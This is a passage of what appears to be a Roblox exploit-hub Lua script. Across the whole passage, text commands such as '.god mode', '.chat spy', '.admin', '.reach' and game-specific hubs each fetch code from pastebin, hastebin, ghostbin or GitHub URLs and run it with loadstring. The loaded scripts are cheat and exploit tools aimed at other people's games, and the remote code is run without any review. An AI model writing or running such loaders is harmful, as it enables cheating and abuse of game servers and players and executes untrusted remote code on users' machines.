		loadstring(game:HttpGetAsync("https://pastebin.com/raw/VkWkuyzc"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".naruto" then
		loadstring(game:HttpGetAsync("https://hastebin.com/raw/ohequwikaf"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".sword" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/GhAfTaGk"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".aureate" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/71S0q0XT"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".stand" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/RZ4v0S3M"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".rope" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/6zBqd3M0"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".username sniper" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/a5vi6aUq"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".god mode" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/sc0UNxwj"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".net fix" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/3m6vxja9"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".blackhole" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/4zY4XvvA"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".flaming umbrella" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/g2heqqYe"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".rb sword" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/N8qyz4YH"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".rc tank" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/SeJPALMu"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".sidestep" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/vh56kMXb"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".electro swing" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/S0ekEXPX"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".spellcaster" then
		loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/o5u3/Spellcaster/main/SpellcasterFE.txt"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".neko" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/ZbuaiGg5"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".racer" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/L1Fybs6W"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".pixel car" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/1Nmes8yC"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".fire block" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/r44CJ09c"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".flip" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/crPcd0vq"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".christmas scythe" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/ddudd4kx"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".christmas sniper" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/HS8bDVzW"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".r6" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/gaQZgG61"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".hand" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/YnfdGb0R"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".naruto" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/HZNCX05U"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".strong stand" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/mDPSU903"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".plane" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/gGJtHawV"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".bike" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/gGJtHawV"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".planes ground" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/1Z76vdmv"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".void eye" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/dNbwYjkr"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".scout" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/G8XGN0AE"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".scout" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/G8XGN0AE"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".vapor gun" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/BBWrfQ89"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".bobs" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/8ASG9gWB"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".noob humper" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/WkkG4LRN"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".pumpkin lord" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/Yk67SfRy"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".shooter fighter" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/KAMMdqgh"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".titan" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/PS0J2NEw"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".void duel" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/bt0e5n4j"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".john doe" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/DwhVGxTs"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".boots" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/pfShTUeY"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".penguin dance" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/UtWvDMuD"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".golem" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/bvhQ4vke"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".chair" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/j93bFLzs"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".grappler" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/cG9Z23pB"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".chat spy" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/LWthUDFE"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".rtx graphics" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/Ba5A2mXj"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".skateboard" then
		loadstring(game:HttpGet("https://hastebin.com/raw/akozareciz"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".eggdog" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/rkAD6D4J"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".stilts" then
		loadstring(game:HttpGetAsync("https://ghostbin.co/paste/2eoao/raw"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".table" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/9kDrHnUd"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".pyramid" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/47FxhPef"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".wall" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/AY6kA2AV"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".fly" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/XHigk9fK"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".crybaby" then
		loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/specowos/CrybabyV2FE/main/CrybabyV2%20FE"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".reach" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/HkXnGkYU"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".car" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/7diQ0vxD"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".idk" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/taV90BLB"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".mommy" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/Hu9h2Dn6"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".animation" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/EQE58hq3"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".rejoin" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/QyWmBd9L"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".topkek" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/628uyZSE"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".arrowhub" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/Yp4g7eEc"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".mm2" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/7ySvSZMp"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".reanimate" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/fdTkE7Tq"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".Andromeda" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/L7jCXUjb"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".kat" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/yvgDA9nk"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".abj" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/5tzJ89y1"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".Arosia" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/Nwit6ZqP"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".LT2" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/1F9dCVVx"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".Babft" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/RdBpTMFd"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".clovr" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/heQTwiWG"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".skeds vr" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/69qeuvag"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".karma" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/RiXcbCCm"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".Selexity" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/g1KLKyT0"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".fire god" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/F4t9aXct"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".ss executor" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/1d4sf1QY​"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".admin" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/qsM4xDCX"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".sus" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/JXUMavf3"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".blink" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/4pc5Wx9E"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".boogabooga" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/AZPFGAMD"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".jailbreak" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/EsZLSpPM"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".game scripts" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/fJBsXwyZ"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".smile" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/rTk7N8xb"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".astrava" then
		loadstring(game:GetObjects("rbxassetid://1468845733")[1].Source)()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".sharkbite" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/TfwREsct"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".the streets" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/naT5j4s9"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".dahood" then
		loadstring(game:GetObjects("rbxassetid://5812737894")[1].Source)()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".babft builder" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/92J1S4B9"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".bad business" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/Hy9yWmui"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".adopt me" then
		loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/BloxiYT/BloxHub-v2/main/Main"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".shindo life" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/Av8NMSSq"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".fnf" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/61VS2xk5"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".tab hub" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/ugDxLMvr"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".cmds" then
		loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/Deeri1/Deeri/main/ew"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".favs" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/tUJN5ibJ"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".flicker" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/dG7J7kyZ"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".loomian" then
		loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/Introvert1337/Releases/master/LoomianLegacyX.lua"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".sushix" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/2mEv0fKL"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".catix" then
		loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/quentin452/CATIX-HUB/master/!Catix%20Hub"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".show keys" then
		loadstring(game:HttpGetAsync("https://hastebin.com/raw/rulepanoha"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".Dumb hub" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/xgUkwkg2"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".troll stand" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/pC674EA2"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".sever sided" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/2SyL3akT"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".devilhub" then
		loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/DevilScript/-Devil.Hub-/DevilScripth/Scr.txt"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".boo hub" then
		loadstring(game:HttpGet("https://raw.githubusercontent.com/PurpleHubs/GhostyHub/master/hubv1.txt"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".big glitcher" then
		loadstring(game:HttpGet("https://raw.githubusercontent.com/Deeri1/ine/main/mine"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".dash admin" then
		loadstring(game:HttpGet("https://pastebin.com/raw/ky90mwdb"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".buster sword" then
		loadstring(game:HttpGet("https://pastebin.com/raw/JmTmEfc6"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".glitcher 1" then
		loadstring(game:HttpGet("https://pastebin.com/raw/8Z5DcQuD"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".glitcher 2" then
		loadstring(game:HttpGet("https://pastebin.com/raw/4sxT1vXt"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".my glitcher" then
		loadstring(game:HttpGet("https://pastebin.com/raw/xi5S564h"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".credits" then
		loadstring(game:HttpGet("https://pastebin.com/raw/DTDNhgEg"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".rb king" then
		loadstring(game:HttpGet("https://raw.githubusercontent.com/Deeri1/ine/main/RB%20king"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".shampoo sim" then
		loadstring(game:HttpGet("https://pastebin.com/raw/czq1Ygst"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".my glitcher 2" then
		loadstring(game:HttpGet("https://raw.githubusercontent.com/Deeri1/ine/main/my%20glider%202"))()
	end
end)
Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".rb king 2" then
		loadstring(game:HttpGet("https://raw.githubusercontent.com/Deeri1/ine/main/rbing%202"))()
	end
end)





